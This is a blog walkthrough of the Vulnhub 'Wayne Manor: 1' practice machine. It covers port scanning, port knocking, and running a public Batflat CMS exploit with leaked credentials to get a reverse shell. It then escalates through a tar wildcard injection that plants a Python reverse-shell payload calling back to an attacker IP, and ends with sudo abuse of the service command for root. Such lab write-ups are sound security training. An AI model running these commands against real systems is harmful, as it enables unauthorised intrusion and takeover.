Vulnhub Wayne Manor: 1 Walkthrough

http://www.vulnhub.com/entry/wayne-manor-1,681/


Read GUIDELINES.txt in unziped files.

GUIDELINES:
    Add '<ip> waynemanor.com' to the '/etc/hosts' file.
    DHCP is ON.
Enjoy!
You can follow me on Twitter (@sec_balkan), in GitHub (@sec-balkan), or send me a message on Telegram (@sec_balkan).


Add <ip> waynemanor.com to /etc/hosts. (Important!)

Scan ports.

nmap -sV -sC -p- 192.168.33.137  -oN ports.log

图片.png


Scan port 80, no need to wait to end.

图片.png


Check /blog, see some hints. It means knock-knock 300, 350, 400 ports, we will get FTP.

图片.png


Knock it. And scan port again.

knock 192.168.33.137 300 350 400

图片.png


Login ftp as anonymous, get info.txt, check it, get cms credentials.

图片.png


The cms is batflat, search exploit.

图片.png


Listen at one terminal, and run the POC at another terminal, get reverse shell.

nc -nlvp 1234
python3 49573.py http://waynemanor.com/ bruce alfred_help_me 192.168.33.128 1234

图片.png


In /home/batman/.web/, found script.sh.

图片.png


If we use pspy64 to check, we will see crontab runs script.sh each minute.

It is tar wildcard exploit. In order to escalate to user "batman", we need create 3 files in /var/www/html.

echo '' > --checkpoint=1
echo '' > --checkpoint-action=exec=sh pwn.sh
cat<<EOF>pwn.sh 
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.33.128",2234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
EOF


Then we listen at port 2234, and will get reverse shell of user "batman"

图片.png


Check sudo -l.

图片.png


Use /usr/sbin/service to get root.

sudo service ../../bin/sh

图片.png


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2023年11月    »
12345
6789101112
13141516171819
20212223242526
27282930
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.3